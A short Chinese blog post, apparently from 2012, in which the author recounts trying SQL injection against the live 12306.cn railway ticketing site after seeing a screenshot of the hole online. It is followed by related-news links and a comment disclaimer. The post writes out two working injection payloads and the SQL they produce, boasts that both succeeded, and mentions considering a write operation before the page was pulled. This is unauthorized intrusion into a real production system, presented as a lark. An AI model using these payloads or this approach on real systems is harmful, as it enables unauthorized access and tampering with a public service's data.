那会儿(8月27日)微博上疯传一张12306.cn的SQL注入漏洞截图:
以前没怎么玩过,那会儿正好有空,所以就上去瞅瞅。根据trace提示简单构造一个:
" OR "1"="1" OR ZIZ="
注入后的效果应就是:
select * from TB_INFO_CLCS where flag = "Y" and czdm ="G" and cxdm like "%" OR "1"="1" OR ZIZ="%" order by cxdm
果了个然~!成功鸟~!同理再构造个子查询:
" AND EXISTS (SELECT * FROM TB_INFO_CLCS) OR ZIZ="
没报错,又成功鸟~!当我正在考虑是否搞个写操作的时候,铁道部迅速撤下了相关页面:
晚上回家后发现该漏洞已经修复鸟~~~~~~Cisco Catalyst 4500E系列交换机拒绝服务漏洞(CVE-2012-4622)12306惊爆SQL注入漏洞相关资讯 SQL注入漏洞
- 已经 14 岁的 SQL 注入仍然是最危 (08/29/2013 13:12:18)
- TYPO3 WEC 讨论区SQL注入漏洞 (02/22/2013 08:55:37)
- MyBB HM_My Country Flags 插件" (12/28/2012 12:15:26)
| - TYPO3 My quiz and poll Extension (02/22/2013 08:56:41)
- Dedecms v5.7 plusfeedback.php (01/02/2013 08:38:51)
- MyBB Awaylist index.php "id"参数 (12/27/2012 08:29:11)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|